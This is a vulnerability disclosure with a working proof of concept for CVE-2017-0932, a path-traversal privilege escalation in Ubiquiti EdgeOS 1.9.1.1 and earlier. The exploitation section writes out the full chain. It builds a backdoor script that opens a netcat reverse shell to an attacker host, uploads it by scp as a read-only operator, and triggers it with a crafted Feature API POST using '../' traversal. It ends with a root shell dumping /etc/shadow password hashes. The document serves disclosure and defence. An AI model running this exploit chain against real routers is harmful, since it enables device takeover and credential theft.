UBNT EdgeOS <= v1.9.1.1 Local Privilege Escalation

UBNT EdgeOS version 1.9.1.1 and prior, consequence of the lack of validation on the input of the Feature functionality, an attacker with access to an operator (read-only) account and ssh connection to the devices, can escalate privileges to admin (root) access in the system.

Vendor: Ubiquiti Networks
Device: Edger Router X
Affected Version: 1.9.1.1 and prior
CVE-ID: CVE-2017-0932

Details

The EdgeOS (firmware v1.9.1.1) is susceptible to a local privilege escalation due a Path Traversal vulnerability in the Feature API. This vulnerability allows an attacker with non-privileged access (read-only) to execute commands on the device with the root rights. The attack consists in sending a maliciously crafted file (using scp with a non-privileged account) to the device and then calling the vulnerable API exploiting the Path Traversal. The exploitation will result on the crafted file being executed with root permission, giving the attacker full access to the device.

Exploitation

First of all, we have to create the following file+directory:

$ cat Backdoor/wizard-run
#!/bin/bash
/usr/bin/nc 192.168.2.2:1337 -e /bin/bash &

Using a non-privileged ‘operator’ user, it was possible to upload the file to the device using the scp command:

$ scp -r Backdoor operator@192.168.2.1:~
Welcome to EdgeOS

By logging in, accessing, or using the Ubiquiti product, you
acknowledge that you have read and understood the Ubiquiti
License Agreement (available in the Web UI at, by default,
http://192.168.1.1) and agree to be bound by its terms.

operator@192.168.2.1's password: 
wizard-run       

After that, using a valid operator session and a path traversal vulnerability, it was possible to call the uploaded file with root privilege:

POST /api/edge/feature.json HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Referer: https://192.168.2.1/
Content-Type: application/json
X-CSRF-TOKEN: 4310724fdcab5474ab225a105bd6f86d43247dbaf5b7f4aa2ec329a641ec55ec
X-Requested-With: XMLHttpRequest
Content-Length: 90
Cookie: ip_address_top_user_option=total_bytes; PHPSESSID=i6um09hej0ku2k5ctcp6ib56f1nrqhi7; X-CSRF-TOKEN=4310724fdcab5474ab225a105bd6f86d43247dbaf5b7f4aa2ec329a641ec55ec
Connection: close

{"data":{"scenario":"../../../../../home/operator/Backdoor","action":"load"}}

And a remote shell will be created:

$ nc -lvp 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from 192.168.2.1 44440 received!
id
uid=0(root) gid=102(vyattacfg)
uname -a
Linux ubnt 3.10.14-UBNT #1 SMP Sat Apr 22 06:38:07 PDT 2017 mips GNU/Linux
cat /etc/shadow
root:!:17283:0:99999:7:::
daemon:*:17283:0:99999:7:::
bin:*:17283:0:99999:7:::
games:*:17283:0:99999:7:::
.. snip snip ..
avahi:*:17283:0:99999:7:::
sshd:*:17283:0:99999:7:::
tss:*:17283:0:99999:7:::
ubnt:$1$zKNoUbAo$gomzUbYvgyUMcD436Wo66.:16436:0:99999:7:::
operator:$6$7SVNi.WB68V0QR5t$efMoCyT2H.mEU6M8s2NDSsW1fv7JnT2eAfK2VxuzsIdcYrEvWCILX8G0CYN/4enwrnT1yYjekQa95TxxHxhVj.:16436:0:99999:7:::

Recommendation

Upgrade the firmware to the latest available version.

Timeline

2017-06-14 - Vulnerability discovered and first report to Ubiquiti Networks
2017-06-14 - UBNT anwsered and confirmed the vulnerability
2017-06-14 - Ubiquiti Networks rewarded with a $1,500 bounty
2017-08-30 - Ubiquiti Networks fixed the vulnerability
2017-11-24 - Ubiquiti Networks agreed with a partial disclosure of the vulnerability
2018-03-05 - Disclosure of technical details

Maycon Vitali

I hack stuff!